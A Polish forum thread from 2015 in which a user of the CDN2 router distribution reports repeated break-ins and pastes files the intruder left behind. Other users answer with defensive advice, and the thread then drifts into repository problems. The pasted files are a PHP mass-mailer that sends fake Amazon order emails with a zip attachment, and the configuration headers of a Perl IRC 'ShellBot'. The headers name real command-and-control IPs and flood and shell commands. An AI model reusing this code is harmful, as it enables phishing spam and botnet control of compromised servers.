Freesco, NND, CDN, EOS http://forum.freesco.pl/ |
|
Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do spr http://forum.freesco.pl/viewtopic.php?f=40&t=18968 |
Strona 1 z 1 |
Autor: | monter [ środa, 18 lutego 2015, 10:59 ] |
Tytuł: | Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do spr |
Czy system cdn2 jest dziurawy ze wzgledu na to ze nie jest juz aktualizowany czy moze to wina konfiguracji ze bardzo szybko mozna sie na niego wlamac? Dlugie hasla weryfikacja 2 etapowa nic nie daly. Juz 2 raz ktos Mi sie wlamal na serwer i pozostawial pliki np takie : <?php $pwd = getcwd(); $email_from = "Amazon LLC <amazon-orders@receipt.com>"; $mail_header .= "Content-Type: multipart/mixed\n"; $email_subject = "Your Amazon order has been dispatched."; // The Subject of the email $email_txt = file_get_contents("index.html"); // Message that the email has in it $fileatt = "$pwd/lllll.zip"; // Path to the file (example) $fileatt_type = "application/zip"; // File Type $fileatt_name = "lllll.zip"; // Filename that will be used for the file as the attachment $file = fopen($fileatt,'rb'); $flsz = filesize($fileatt); $data = fread($file,$flsz); fclose($file); $semi_rand = md5(time()); $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x"; $headers="From: $email_from"; // Who the email is from (example) $headers .= "\nMIME-Version: 1.0\n" . "Content-Type: multipart/mixed;\n" . " boundary=\"{$mime_boundary}\""; $email_message .= "Take Actionfve\n\n" . "--{$mime_boundary}\n" . "Content-Type:text/html; charset=\"iso-8859-1\"\n" . "Content-Transfer-Encoding: 7bit\n\n" . $email_txt; $email_message .= "\n\n"; $data = chunk_split(base64_encode($data)); $email_message .= "--{$mime_boundary}\n" . "Content-Type: {$fileatt_type};\n" . " name=\"{$fileatt_name}\"\n" . "Content-Transfer-Encoding: base64\n\n" . $data . "\n\n" . "--{$mime_boundary}--\n"; $subject = "Take Actionfve"; //$data = file_get_contents("lllll.zip"); $body = file_get_contents("index.html"); if (!($fp = fopen("list.txt", "r"))) exit("Unable to open $listFile."); $i=0; print "Start time is "; print date("Y:m:d H:i"); print "\n"; while (!feof($fp)) { fscanf($fp, "%s", $name); $i++; <------> mail($name,$email_subject,$email_message,$headers); nastepny #!/usr/bin/perl^M # - Adicionado comando !estatisticas ;^M # - Alterado o comando @pacota para @oldpack;^M # - Adicionado dois novos pacotadores: @udp e @udpfaixa ;^M # - Adicionado um novo portscan -> @fullportscan ;^M # - Adicionado comando @conback com suporte para Windows/Unix ;^M # - Adicionado comando: !sair para finalizar o bot;^M # - Adicionado comando: !novonick para trocar o nick do bot por um novo aleatorio;^M # - Adicionado comando !entra e !sai ;^M # - Adicionado comando @download ;^M # - Adicionado comando !pacotes para ativar/desativar pacotes ;^M ^M ########## CONFIGURACAO ############^M my $processo = '/usr/local/apache/bin/httpd -DSSL';^M ^M $servidor='64.32.12.57' unless $servidor;^M my $porta='80';^M my @canais=("#gnu");^M my @adms=("max","laris","x");^M my @auth=("*!*@max.cc");^M ^M # Anti Flood ( 6/3 Recomendado )^M my $linas_max=6;^M my $sleep=3;^M ^M my $nick = getnick();^M my $ircname = getnick();^M my $realname = getnick();^M ^M my $acessoshell = 1;^M ######## Stealth ShellBot ##########^M my $prefixo = "#";^M my $estatisticas = 0;^M my $pacotes = 1;^M ####################################^M ^M my $VERSAO = '0.2a';^M ^M $SIG{'INT'} = 'IGNORE';^M $SIG{'HUP'} = 'IGNORE';^M $SIG{'TERM'} = 'IGNORE';^M $SIG{'CHLD'} = 'IGNORE';^M $SIG{'PS'} = 'IGNORE';^M ^M nastepny #!/usr/bin/perl # - Adicionado comando !estatisticas ; # - Alterado o comando @pacota para @oldpack; # - Adicionado dois novos pacotadores: @udp e @udpfaixa ; # - Adicionado um novo portscan -> @fullportscan ; # - Adicionado comando @conback com suporte para Windows/Unix ; # - Adicionado comando: !sair para finalizar o bot; # - Adicionado comando: !novonick para trocar o nick do bot por um novo aleatorio; # - Adicionado comando !entra e !sai ; # - Adicionado comando @download ; # - Adicionado comando !pacotes para ativar/desativar pacotes ; ########## CONFIGURACAO ############ my $processo = '/usr/local/apache/bin/httpd -DSSL'; $servidor='88.151.99.145' unless $servidor; my $porta='80'; my @canais=("#ravenul3"); my @adms=("raven","hak"); my @auth=("*!*@hak.ro"); # Anti Flood ( 6/3 Recomendado ) my $linas_max=6; my $sleep=3; my $nick = getnick(); my $ircname = getnick(); my $realname = getnick(); my $acessoshell = 1; ######## Stealth ShellBot ########## my $prefixo = "#"; my $estatisticas = 0; my $pacotes = 1; #################################### my $VERSAO = '0.2a'; $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; |
Autor: | Maciek [ środa, 18 lutego 2015, 12:05 ] |
Tytuł: | Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do |
Nie można wykluczyć, ze "coś" na CDN2 jest dziurawe i następują włamania za pomocą prostego exploita. Nie wiem, nie używałem, jedynie Saturas mógłby coś powiedzieć. Jednak z dużym prawdopodobieństwem można szukać przyczyn gdzie indziej: - zbyt proste hasła userów systemowych; - źle napisane strony w php, umożliwiające wykonanie własnego kodu włamywacza; Ten drugi przypadek jest dość powszechny. Włamywacz nie uzyskuje bezpośrednich uprawnień w systemie, ale udaje mu się zapisać pliki w /tmp i odpalić skrypty, które do czegoś mu służą. |
Autor: | monter [ środa, 18 lutego 2015, 12:23 ] |
Tytuł: | Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do |
Dokladnie w tmp Mi sie pojawiaja pliki nowe.Co do plikow php to mam jeden do pokazywania statystyk niceshapera ale moge z niego zrezygnować. bo serwer potrzebuje tylko do podzialu pasma i przekierowania portow na kamery nawet nie potrzebuje zdalnego dostepu. Da sie jakos utrudnic wlamanie ograniczajac dostep do serwera ? |
Autor: | Maciek [ środa, 18 lutego 2015, 23:44 ] |
Tytuł: | Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do |
Jeśli już raz maiłeś włamanie, to system jest trefny. Nie masz pewności, czy coś w nim nie zostało zmienione. Jeśli nastąpiło przejęcie roota, to tylko wyczyścić dysk i zainstalować system od zera. Zobacz co masz otwarte z zewnątrz (iptables -L) i jeśli możesz zamknąć, to zamknij. Choć nie ma gwarancji, że włamywacz nie ma backdoora. |
Autor: | monter [ czwartek, 19 lutego 2015, 12:53 ] |
Tytuł: | Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do |
Wiem . Wlasnie zapasowy serwer probuje odpalic na cdn2 ale pakiety chyba nie dzialaja bo pacman nic nie moze pobrac nawet mc a bez mc to nic nie zrobie. |
Autor: | CyberDuck [ środa, 5 sierpnia 2015, 20:20 ] |
Tytuł: | Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do |
No wlasnie ... Zaczely sie upaly i chcialem doinstalowac sobie lm_sensors ... Ale sa ciagle problemy z repozytorium extra. Cos sie zmieni w tej kwestii ? Posluchajcie jesli Macie problem z serwerem to moge zaoferowac pomoc. |
Autor: | Maciek [ niedziela, 9 sierpnia 2015, 12:37 ] |
Tytuł: | Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do |
O ile pamiętam to po awarii serwera u Albercika (dawno temu), nie udało się odzyskać części danych. Jedyny serwer z pakietami jest pod adresem cdn.freesco.pl - innego nie ma i nie będzie. Czas pomyśleć o czymś innym. |
Autor: | CyberDuck [ wtorek, 11 sierpnia 2015, 12:20 ] |
Tytuł: | Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do |
A w źyciu Maćku ... Chyba , że mnie do tego zmusicie |
Autor: | CyberDuck [ wtorek, 11 sierpnia 2015, 12:24 ] |
Tytuł: | Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do |
Monter i to nie koniec lanow Sam pracuje w firmie i to rozwijajacej sie w ktorej sprzedaje sie internet przez lan pppoe. Nawet Ci powiem ze tv tez idzie raczej wlasnie w te strone. Sprzet tez bardzo tanieje. |
Autor: | rikardo7 [ poniedziałek, 17 sierpnia 2015, 11:00 ] |
Tytuł: | Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do |
Maciek pisze: O ile pamiętam to po awarii serwera u Albercika (dawno temu), nie udało się odzyskać części danych. Jedyny serwer z pakietami jest pod adresem cdn.freesco.pl - innego nie ma i nie będzie. Czas pomyśleć o czymś innym. A nie jest to czasem repo CDN a nie CDN2? |
Autor: | Maciek [ czwartek, 20 sierpnia 2015, 17:24 ] |
Tytuł: | Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do |
Nie wiem. Wiem, że jest jedyny. |
Strona 1 z 1 | Strefa czasowa UTC+2godz. |
Powered by phpBB® Forum Software © phpBB Group https://www.phpbb.com/ |